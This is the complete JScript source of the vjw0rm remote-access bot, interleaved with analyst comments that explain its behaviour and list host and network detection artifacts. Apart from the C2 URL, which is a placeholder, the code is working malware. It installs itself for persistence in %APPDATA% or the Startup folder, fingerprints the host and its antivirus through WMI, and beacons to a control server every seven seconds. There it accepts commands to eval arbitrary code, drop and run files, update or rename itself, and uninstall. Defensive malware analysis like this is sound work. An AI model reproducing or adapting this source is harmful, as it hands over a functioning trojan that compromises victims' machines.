vjw0rm
// ---- Analyst annotations (defensive read of the vjw0rm JScript bot) ----
// Three lookup tables hold the COM ProgIDs, registry strings and WMI names used below; splitting
// string constants into indexed arrays is the only obfuscation visible in this listing.
// j[N] is instantiated through Cr(N) with new ActiveXObject().
var j = [ | |
'WScript.Shell', | |
'Scripting.FileSystemObject', | |
'Shell.Application', | |
'Microsoft.XMLHTTP' | |
]; | |
// Registry strings. Only g[2] (the HKCU\vjw0rm value used as a first-run marker) and g[5] (the
// REG_SZ value type) are referenced in the code shown; the Run-key, Classes and defaulticon
// entries are unused here.
var g = [ | |
'HKCU', | |
'HKLM', | |
'HKCU\\vjw0rm', | |
'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\', | |
'HKLM\\SOFTWARE\\Classes\\', | |
'REG_SZ', | |
'\\defaulticon\\' | |
]; | |
// WMI moniker and class names queried in Ob() to fingerprint the host.
var y = [ | |
'winmgmts:', | |
'win32_logicaldisk', | |
'Win32_OperatingSystem', | |
'AntiVirusProduct' | |
]; | |
var sh = Cr(0); //'WScript.Shell' | |
var fs = Cr(1); //'Scripting.FileSystemObject' | |
var spl = '|V|'; //command and control delimiter | |
var Ch = '\\'; | |
var VN = 'vjw0rm' + '_' + Ob(6); // bot ID - Ob(6) - Volume serial number | |
var fu = WScript.ScriptFullName; // script fullname | |
var wn = WScript.ScriptName; // script name | |
// U holds the HKCU\vjw0rm marker value ('TRUE' / 'FALSE'). In the code shown it is not used for
// control flow; it is only reported back to the C2 as part of the fingerprint built by nf().
var U; | |
try { // attempts to create HKCU\\vjw0rm registry | |
// RegRead throws when the value does not exist yet (first run); that exception drives the catch below.
U = sh.RegRead(g[2]); | |
} catch (err) { | |
var sv = fu.split('\\'); | |
if (':\\' + sv[1] == ':\\' + wn) { // if first layer directory == to script name | |
U = 'TRUE'; | |
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ TRUE | |
} else { | |
U = 'FALSE'; | |
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ FALSE | |
} | |
} | |
// Detection: whichever branch runs, a REG_SZ value named vjw0rm directly under HKCU is written on first run.
Ns(); // Install malware | |
// Main command loop: one POST to the C2 every 7 seconds (WScript.Sleep(7000) below); the reply is
// split on '|V|' into [command, arg1, arg2]. Every handler's errors are swallowed by the empty
// catch, so a failed download or write does not stop the beacon. Host-side artifacts to look for:
// files written under %temp% and launched by wscript.exe (Sc / RF / Up), the script file being
// rewritten in place and relaunched with 'wscript.exe //B' (Rn), and eval() of server-supplied
// text (Ex / Un).
do { // | |
try { | |
var P = Pt('Vre', ''); // send POST request to the command and control server | |
P = P.split(spl); // get command from the control server | |
if (P[0] === 'Cl') { // Cl = Close Bot script | |
WScript.Quit(1); | |
} | |
if (P[0] === 'Sc') { // Sc = Save script file to %temp% and run | |
// P[2] is the file name, P[1] the file body; both come straight from the C2 reply.
var s2 = Ex('temp') + '\\' + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
if (P[0] === 'Ex') { // Ex = execute script using Eval | |
// Arbitrary server-supplied JScript evaluated in the bot's own context.
eval(P[1]); | |
} | |
if (P[0] === 'Rn') { // Rn = rename bot | |
// Reads its own source, replaces the first occurrence of the current bot-ID prefix with P[1],
// writes the file back, relaunches itself hidden (//B) and exits. VN is reassigned from a
// string to an array here and never restored; that only matters because the script quits right after.
var ri = fs.OpenTextFile(fu, 1); | |
var fr = ri.ReadAll(); | |
ri.Close(); | |
VN = VN.split('_'); | |
fr = fr.replace(VN[0], P[1]); | |
var wi = fs.OpenTextFile(fu, 2, false); | |
wi.Write(fr); | |
wi.Close(); | |
sh.run('wscript.exe //B "' + fu + '"'); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'Up') { //Up = update bot | |
// Writes the replacement script to %temp%\P[2]. '|U|' in the delivered body is swapped for
// '|V|' first, consistent with the reply itself having been split on '|V|' above. The new
// copy is started with window style 6 (minimized) and this instance exits.
var s2 = Ex('temp') + '\\' + P[2]; | |
var ctf = fs.CreateTextFile(s2, true); | |
var gu = P[1]; | |
gu = gu.replace('|U|', '|V|'); | |
ctf.Write(gu); | |
ctf.Close(); | |
sh.run('wscript.exe //B "' + s2 + '"', 6); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'Un') { // Un = uninstall bot | |
// The server supplies the uninstall script; %f, %n, %sfdr and %RgNe% are substituted (first
// occurrence only, String.replace with a string pattern) and the result is eval'd. Note vdr
// points at %Temp%\<script name>, not the %APPDATA% path Ns() installs to — as written.
var s2 = P[1]; | |
var vdr = Ex('Temp') + Ch + wn; | |
var regi = 'Nothing!'; | |
s2 = s2.replace('%f', fu).replace('%n', wn).replace('%sfdr', vdr).replace('%RgNe%', regi); | |
eval(s2); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'RF') { // RF = same as Sc | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
} catch (err) { | |
// Empty catch: every error in the loop body is discarded, as written.
} | |
WScript.Sleep(7000); // phone home every 7 seconds | |
} while (true); | |
// Expands the environment variable S via WshShell.ExpandEnvironmentStrings('%S%').
// Used below for temp, Temp, APPDATA, Windir, COMPUTERNAME and USERNAME.
function Ex(S) { | |
return sh.ExpandEnvironmentStrings('%' + S + '%'); | |
} | |
// C2 transport. Sends a synchronous POST (third open() argument false) to '<control server>' + C
// with body A and returns the response text; '<control server>' is a placeholder standing in for the
// real URL of a live sample. The User-Agent header carries the host fingerprint built by nf(), so a
// non-browser User-Agent of that shape on periodic wscript.exe connections is a practical network
// detection point. The property name 'responsetext' is spelled in lower case as in the original.
function Pt(C, A) { // send POST request to command and control | |
var X = Cr(3); | |
X.open('POST', '<control server>' + C, false); | |
X.SetRequestHeader('User-Agent:', nf()); // user agent = host fingerprint from nf(): <bot ID>\<COMPUTERNAME>\<USERNAME>\<OS caption>\<AV product>\<empty>\<vbc.exe present YES|NO>\<HKCU\\vjw0rm value>\ | |
X.send(A); | |
return X.responsetext; | |
} | |
// Builds the host fingerprint string that Pt() sends as the User-Agent. Fields are joined with '\'
// and, as assembled below, appear in this order:
//   <bot ID>\<COMPUTERNAME>\<USERNAME>\<OS caption (Ob(2))>\<AV product (Ob(4))>\<empty field>\<YES|NO>\<HKCU\vjw0rm value>\
// YES/NO records whether the .NET 2.0 C# compiler (vbc.exe) exists under %Windir%; why the operator
// wants that is not established by this file.
function nf() { // get system information | |
var s, NT, i; | |
if (fs.fileexists(Ex('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) { | |
NT = 'YES'; | |
} else { | |
NT = 'NO'; | |
} | |
//system information format (note the doubled Ch producing an empty field): vjw0rm_<volume serial number>\<COMPUTERNAME>\<USERNAME>\<OS name>\<AV product installed>\\<VBC.exe installed - YES/NO>\<HKCU\\vjw0rm value>\ | |
s = VN + Ch + Ex('COMPUTERNAME') + Ch + Ex('USERNAME') + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch; | |
return s; | |
} | |
// Instantiates the COM object whose ProgID is j[N] (WScript.Shell, Scripting.FileSystemObject,
// Shell.Application or Microsoft.XMLHTTP). Indirection through the array keeps the ProgIDs out of
// the call sites.
function Cr(N) { | |
return new ActiveXObject(j[N]); | |
} | |
// Queries WMI for the host-fingerprint fields reported by nf():
//   N == 2 -> Win32_OperatingSystem.Caption of the first instance (OS name)
//   N == 4 -> AntiVirusProduct.DisplayName from root\securitycenter, retried under root\securitycenter2
//   N == 6 -> volumeserialnumber of the first win32_logicaldisk instance (bot-ID suffix)
// Any other N, or an empty result set, falls through and returns undefined. WMI queries from
// wscript.exe — in particular the SecurityCenter AntiVirusProduct lookup — are themselves a useful
// detection signal.
function Ob(N) { | |
var s; | |
if (N == 2) { // Get operating system | |
s = GetObject(y[0]).InstancesOf(y[2]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
return it.Caption; | |
// the break below is unreachable after the return above — left as written
break; | |
} | |
} | |
if (N == 4) { // get Antivirus product installed | |
var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter'; | |
s = GetObject(wmg).InstancesOf(y[3]); | |
var en = new Enumerator(s); | |
// Walks every row but keeps only the last DisplayName; with no rows, str is left undefined.
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
var str = it.DisplayName; | |
} | |
// undefined !== '' is true, so an empty first result set also takes this branch and retries under
// root\securitycenter2 (wmg + '2'); if that returns no rows either, the function returns undefined.
if (str !== '') { | |
wmg = wmg + '2'; | |
s = GetObject(wmg).InstancesOf(y[3]); //y[3] = AntiVirusProduct | |
en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
it = en.item(); | |
return it.DisplayName; | |
} | |
} else { | |
// Reached only when the last DisplayName was '', so this returns that empty string.
return it.DisplayName; | |
} | |
} | |
if (N == 6) { // get Volume serial number | |
s = GetObject(y[0]).InstancesOf(y[1]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
return it.volumeserialnumber; | |
// the break below is unreachable after the return above — left as written
break; | |
} | |
} | |
} | |
// Persistence. Copies the running script to %APPDATA%\<script name>, overwriting any existing file;
// if that fails, copies it into Shell.Application special folder 7 (the Startup folder) instead.
// Both failures are swallowed by empty catch blocks. For defenders, a script file carrying the
// original script's name appearing under %APPDATA% or the Startup folder is the on-disk artifact.
function Ns() { // install bot to appdata and startup folder | |
var dr = Ex('APPDATA') + Ch + wn; | |
try { | |
fs.CopyFile(fu, dr, true); | |
} catch (err) { | |
try { | |
var ap = Cr(2); | |
fs.CopyFile(fu, ap.NameSpace(7).Self.Path + '\\' + wn, true); | |
} catch (err) { | |
// second copy failure also discarded — as written
} | |
} | |
} |